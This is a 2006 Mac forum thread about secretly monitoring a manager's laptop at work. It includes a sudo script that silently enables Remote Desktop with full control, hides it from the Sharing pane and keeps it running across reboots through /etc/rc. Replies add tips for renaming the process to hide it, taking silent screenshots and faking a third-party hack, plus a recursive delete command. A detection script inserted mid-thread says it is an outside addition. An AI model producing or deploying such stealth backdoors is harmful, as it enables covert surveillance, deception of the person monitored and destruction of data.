The macosxhints Forums > OS X Help Requests > Applications
Old 09-05-2006, 04:55 AM   #1
digitaljunkie
Triple-A Player
 
Join Date: Nov 2005
Posts: 70
Grey Question... Hiding Remote Desktop or SSH

OK, we have someone at work who is believed to be "messing" around, i.e. downloading, chatting and even possibly damaging the company's integrity, whilst in the office.

The problem is they are a Manager that uses a full admin account on their laptop. Because sensitive information may be stored on managerial laptops we don't Remote Desktop or SSH these laptops; if there's an issue we physically sit at the machine.

I have been asked by a Director if I can report at any given point what applications that person has running or what they are doing.
The problem is this person is fairly computer literate, and turning Remote Desktop on and not showing when it is active isn't really inconspicuous enough to gather proof.

Does anyone have any suggestions?
Old 09-05-2006, 05:56 AM   #2
acme.mail.order
League Commissioner
 
Join Date: Sep 2003
Location: Tokyo
Posts: 6,046
SSH is completely transparent to the console user, but if he knows it's supposed to be turned off it's really obvious that it's been changed. I've never used ARD, but VNC server is invisible IF it's started from the terminal. I do this regularly at my office (the staff aren't evil, they just don't read instructions) . You can detect VNC from the Terminal easily.

There are several keyloggers and screen capture programs for OSX - start at VersionTracker. Some of them pop up a small window until you pay for them, but the shareware fees shouldn't bankrupt you. How well they hide is an issue. Is he likely to poke around in the background processes?

Intercepting the mail/net traffic too? Don't need anything on his laptop for that.

If I were in your place, I would make it look like his machine had been hacked by a 3rd party - e.g. a hidden account named "0vvn3D" containing either a Star Trek site or gay poяn - something that the observee would never suspect you of. Naturally keep the Directors in the loop.

Last edited by acme.mail.order; 09-05-2006 at 07:08 AM.
Old 09-05-2006, 06:42 AM   #3
voldenuit
Hall of Famer
 
Join Date: Sep 2003
Location: Old Europe
Posts: 4,969
The cleanest approach would be to listen to the traffic via the diagnostics port of the switch, that way you don't even have to touch the machine.

Also be extremely careful to get full cover for what you do (in writing, the whole thing has decent chances of ending up in court one way or the other) and if in doubt about the legality of what you're about to do, consult a lawyer.
The Eichmann defense (they told me to kill them) doesn't work.

Preferably all you do should not only be legal, but also covered by company policy. Finally note that you'd better be on the winning side of this story or you may be looking for a new job real soon...

You should at least consider the possibility that the guy who asked you is trying to frame the manager for stuff that might not be work-related, and key loggers and other intrusive tricks can't tell private and company use apart, so this is a really tricky subject.

Perhaps suggest they hire a PI instead, that way you're out of the loop entirely.
Old 09-05-2006, 06:58 AM   #4
digitaljunkie
Triple-A Player
 
Join Date: Nov 2005
Posts: 70
Thanks for all the comments...

Quote:
Originally Posted by voldenuit
The cleanest approach would be to listen to the traffic via the diagnostics port of the switch,


This does interest me. When you say switch, do you refer to the router? Our switch is a rackmounted Netgear 10/100 switch.

The router is a DrayTek 2800, which also acts as the DHCP server.
Old 09-05-2006, 07:06 AM   #5
acme.mail.order
League Commissioner
 
Join Date: Sep 2003
Location: Tokyo
Posts: 6,046
Quote:
Originally Posted by voldenuit
Perhaps suggest they hire a PI instead, that way you're out of the loop entirely.

But then he's also out of the brownie-points loop

The company lawyer is a good idea. And you said A Director? Singular? How many are there and are they all involved? If this is all legit then the Director shouldn't have any problems sitting down with you and the company lawyer. Record the meeting.
Old 09-05-2006, 07:12 AM   #6
voldenuit
Hall of Famer
 
Join Date: Sep 2003
Location: Old Europe
Posts: 4,969
Quote:
Originally Posted by acme.mail.order
But then he's also out of the brownie-points loop

Hacking is fun; being involved in Machiavellian schemes takes folks who can handle it, and people skilled to do both well are rare.
It's dangerous and may be ethically and legally very, very borderline if not beyond.
A company lawyer will also place the company's interests before those of digitaljunkie, who should make sure to have a very precise understanding of the legal framework for doing this kind of stuff.

Quote:
Originally Posted by digitaljunkie
This does interest me. When you say switch, do you refer to the router? Our switch is a rackmounted Netgear 10/100 switch.

I'm reasonably familiar with networking terminology, so yes, the switch is your target here.

Most rack-mounted models are managed, read the documentation and you'll most probably find some very interesting features for your purpose.

Again, be really careful about politics and legality, it's you, not one of them who's gonna be sued, fired or both.

Last edited by voldenuit; 09-05-2006 at 07:21 AM.
Old 09-05-2006, 01:48 PM   #7
fenrack
Triple-A Player
 
Join Date: Apr 2002
Posts: 127
the magic script

run with sudo

-----
#!/bin/bash

### start ARD with all privileges for all users
/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent
### edit /etc/hostconfig so ARD isn't checked in the Sharing pref pane
### badly need some delay here in order for ARD to start correctly and ports 3283 and 5900 to be opened correctly; I have tried with many different values, over 15 seems to be working 100% of the time, made it 20 sec to be sure
sleep 20
sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2
mv /tmp/output2 /etc/hostconfig
### modifying /etc/rc so ARD is started in stealth mode at every boot
sed 's/exit 0//' < /etc/rc > /tmp/output1
echo "/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -configure -access -on -privs -ControlObserve -DeleteFiles -TextMessages -OpenQuitApps -RestartShutdown -SendFiles -ChangeSettings -GenerateReports -clientopts -setmenuextra -menuextra no -quiet -agent" >> /tmp/output1
echo "sleep 20" >> /tmp/output1
echo "/usr/bin/sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2" >> /tmp/output1
echo "/bin/mv /tmp/output2 /etc/hostconfig" >> /tmp/output1
echo "exit 0" >> /tmp/output1
mv /tmp/output1 /etc/rc

exit 0
------

*cough*
I'm not responsible for whatever you do with that; educational purpose.
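A defender-side check for the persistence the script above sets up, added here as an example that is not from the thread or any of its posters: it flags an /etc/rc that calls kickstart directly, and an /etc/hostconfig that says ARDAGENT=-NO- while an ARDAgent process is nonetheless running. The function name and parameter layout are my own; the sample files and process listing are constructed, not taken from a real machine.

```shell
#!/bin/sh
# Added example, not from the thread: checks a Mac (or saved copies of its files) for
# the two persistence edits fenrack's script makes. Paths and the process listing
# are parameters so the check can run offline against copies.
# Returns 0 when nothing is found; otherwise prints each finding and returns 1.
check_ard_persistence() {
    hostconfig="${1:-/etc/hostconfig}"
    rc="${2:-/etc/rc}"
    pslist="${3:-}"    # captured 'ps axww' output; empty means ask the live system
    findings=0

    # 1. kickstart appended to /etc/rc: the agent is started at boot outside the
    #    normal Startup Items, which is the line fenrack's script echoes into rc.
    if grep -q 'RemoteManagement/ARDAgent.app/Contents/Resources/kickstart' "$rc" 2>/dev/null; then
        echo "FINDING: $rc invokes kickstart directly"
        findings=$((findings + 1))
    fi

    # 2. hostconfig claims ARD is off (so the Sharing pane shows it unchecked) ...
    if grep -q '^ARDAGENT=-NO-' "$hostconfig" 2>/dev/null; then
        # ... yet an ARDAgent process is running: the pane and reality disagree.
        if [ -n "$pslist" ]; then
            running=$(printf '%s\n' "$pslist" | grep -c '[A]RDAgent' || true)
        else
            running=$(ps axww | grep -c '[A]RDAgent' || true)
        fi
        if [ "$running" -gt 0 ]; then
            echo "FINDING: ARDAGENT=-NO- in $hostconfig but ARDAgent is running"
            findings=$((findings + 1))
        fi
    fi

    [ "$findings" -eq 0 ]
}

# Constructed sample, not data from a real machine: hostconfig says off, rc was
# patched, and the process list shows the agent anyway.
SAMPLE_DIR=$(mktemp -d)
printf 'AFPSERVER=-NO-\nARDAGENT=-NO-\nSSHSERVER=-YES-\n' > "$SAMPLE_DIR/hostconfig"
printf '#!/bin/sh\n/System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/Resources/kickstart -activate -quiet\nsleep 20\nexit 0\n' > "$SAMPLE_DIR/rc"
SAMPLE_PS='  PID  TT  STAT      TIME COMMAND
  312  ??  Ss     0:01.02 /System/Library/CoreServices/RemoteManagement/ARDAgent.app/Contents/MacOS/ARDAgent
  640 p1   S      0:00.01 -bash'
if check_ard_persistence "$SAMPLE_DIR/hostconfig" "$SAMPLE_DIR/rc" "$SAMPLE_PS"; then
    echo "clean"
else
    echo "suspicious: review the findings above"
fi
rm -rf "$SAMPLE_DIR"
```

Run it with no arguments on the machine itself to check the live /etc/rc, /etc/hostconfig and process table; a legitimately enabled ARD (ARDAGENT=-YES-) is not flagged.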
Old 09-05-2006, 03:16 PM   #8
hayne
Site Admin
 
Join Date: Jan 2002
Location: Montreal
Posts: 31,941
Quote:
Originally Posted by fenrack
the magic script

You forgot to supply the complementary script for the other side:

Code:
#!/bin/sh
# hide what we are doing from snoopy admins
A=A;R=R;D=D;g=g;e=e;n=n;t=t;k=k;i=i;l=l;a=a
while :; do
    ps axww | grep [$A]$R$D$A$g$e$n$t
    if [ $? = 0 ]; then
        echo "$A$R$D$A$g$e$n$t is running"
        echo "About to $k$i$l$l $A$R$D$A$g$e$n$t"
        $k$i$l$l$a$l$l $A$R$D$A$g$e$n$t
    fi

    sleep 60
done
__________________
hayne.net/macosx.html

Last edited by hayne; 09-06-2006 at 12:33 AM. Reason: add obfuscation
Old 09-05-2006, 04:03 PM   #9
fenrack
Triple-A Player
 
Join Date: Apr 2002
Posts: 127
hayne, let's please not suppose our guy is a shell scripter



PS: Thx for bringing the Light side anyway
Old 09-05-2006, 09:54 PM   #10
acme.mail.order
League Commissioner
 
Join Date: Sep 2003
Location: Tokyo
Posts: 6,046
Quote:
Originally Posted by fenrack
sed '/ARDAGENT=-YES-/s//ARDAGENT=-NO-/g' < /etc/hostconfig > /tmp/output2
mv /tmp/output2 /etc/hostconfig

Small timesaver: (edits the file in place)

perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig
Old 09-05-2006, 10:09 PM   #11
acme.mail.order
League Commissioner
 
Join Date: Sep 2003
Location: Tokyo
Posts: 6,046
Maybe you want to add this to the process, but watch the timing as it will take a while to finish. Should only need to be done once, perhaps at reboot with a Console Message "Optimizing File System" to cover the scanning.

nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm
Old 09-06-2006, 12:37 AM   #12
hayne
Site Admin
 
Join Date: Jan 2002
Location: Montreal
Posts: 31,941
Quote:
Originally Posted by acme.mail.order
nice -n 20 grep -lr 'kill.*ARDAgent' /* 2> /dev/null | xargs rm

What's the point of that? It would only catch scripts where the scripter didn't use any obfuscation.
__________________
hayne.net/macosx.html
Old 09-06-2006, 12:44 AM   #13
acme.mail.order
League Commissioner
 
Join Date: Sep 2003
Location: Tokyo
Posts: 6,046
If the guy's smart enough to do that, then we can all go home. He'll notice any monitoring and will be covering his tracks.
Old 09-06-2006, 12:55 AM   #14
hayne
Site Admin
 
Join Date: Jan 2002
Location: Montreal
Posts: 31,941
Quote:
Originally Posted by acme.mail.order
If the guy's smart enough to do that, then we can all go home.

He/she doesn't have to be all that smart - e.g. he/she could just copy my script from above.
__________________
hayne.net/macosx.html
Old 09-06-2006, 06:02 AM   #15
fenrack
Triple-A Player
 
Join Date: Apr 2002
Posts: 127
Quote:
Originally Posted by acme.mail.order
Small timesaver: (edits the file in place)

perl -pi -e 's/ARDAGENT=-YES-/ARDAGENT=-NO-/' /etc/hostconfig

omg.. you can't believe how hard I tried to do this
I'm such a noob lol
thank you a thousand times
Old 09-06-2006, 09:42 AM   #16
acme.mail.order
League Commissioner
 
Join Date: Sep 2003
Location: Tokyo
Posts: 6,046
Quote:
Originally Posted by hayne
He/she doesn't have to be all that smart - e.g. he/she could just copy my script from above.

Which you recently changed

mv ARDAgent smbmount

<substitute any unix-sounding name that isn't being used. Real utilities that aren't used on that box, like `named`, will hide well.>

Then adjust references to ARDAgent to the new name in fenrack's script, /etc/hostconfig and Startup Items. With a small amount of work, you can bury it so deep only forensic analysis will find it. Or a port scanner.

If ARD doesn't like having its process name changed, VNC Server doesn't care.
Old 09-06-2006, 09:44 AM   #17
acme.mail.order
League Commissioner
 
Join Date: Sep 2003
Location: Tokyo
Posts: 6,046
Just discovered this one - secret screen captures from the shell:

screencapture -mx filename.pdf

-m : main monitor; -x : no audio

about 80kb per capture, they would need to be copied off fairly regularly.
Old 09-06-2006, 06:10 PM   #18
fenrack
Triple-A Player
 
Join Date: Apr 2002
Posts: 127
Quote:
Originally Posted by acme.mail.order
Just discovered this one - secret screen captures from the shell:

screencapture -mx filename.pdf

-m : main monitor; -x : no audio

about 80kb per capture, they would need to be copied off fairly regularly.

make that "screencapture -mx filename.png" for 10.4.x or it won't open (bad PDF header)
Old 09-07-2006, 06:20 AM   #19
digitaljunkie
Triple-A Player
 
Join Date: Nov 2005
Posts: 70
ok, I'll have a play with those, thanks peeps.

I noticed a wireless network that's unprotected, and it appears that the person is using that for MSN as well.
Is there any way to prevent their laptop from joining said specified network without actually locking it down?
Old 09-07-2006, 07:07 AM   #20
voldenuit
Hall of Famer
 
Join Date: Sep 2003
Location: Old Europe
Posts: 4,969
Yes, but WLAN is even easier to tap than Ethernet, so why would you do that?